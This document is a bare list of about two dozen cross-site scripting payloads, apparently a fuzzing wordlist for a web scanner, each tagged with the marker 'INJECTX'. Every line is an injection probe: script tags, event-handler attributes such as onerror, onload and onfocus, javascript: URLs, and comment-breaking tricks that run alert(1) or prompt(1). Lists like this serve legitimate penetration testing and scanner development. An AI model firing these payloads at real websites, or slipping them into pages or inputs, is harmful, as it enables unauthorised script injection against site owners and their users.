javascript:alert(1)//INJECTX
<svg/onload=alert(1)>//INJECTX
<img src=x onerror=alert(1)>//INJECTX
<img src=x onerror=prompt(1)>//INJECTX
<iframe/onload=alert(1)>//INJECTX
<marquee onstart=alert(1)>//INJECTX
<video><source onerror="alert(1)">//INJECTX
<audio><source onerror="alert(1)">//INJECTX
<a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
<input autofocus onfocus=alert(1)>//INJECTX
<select autofocus onfocus=alert(1)>//INJECTX
<textarea autofocus onfocus=alert(1)>//INJECTX
<keygen autofocus onfocus=alert(1)>//INJECTX
<button form=test onformchange=alert(1)>//INJECTX
<p onclick=alert(1)>Click Me</p>//INJECTX
<script>alert(1)//INJECTX</script>
<script>alert(1)<!--INJECTX</script>
<script>$=1,alert($)</script>//INJECTX
<svg onload=(alert)(1)>//INJECTX
<svg/onload=alert`1`>//INJECTX
<img/src=x onerror=alert`1`>//INJECTX
<!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
<form><button formaction="javascript:alert(1)">Click</button></form>//INJECTX
<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
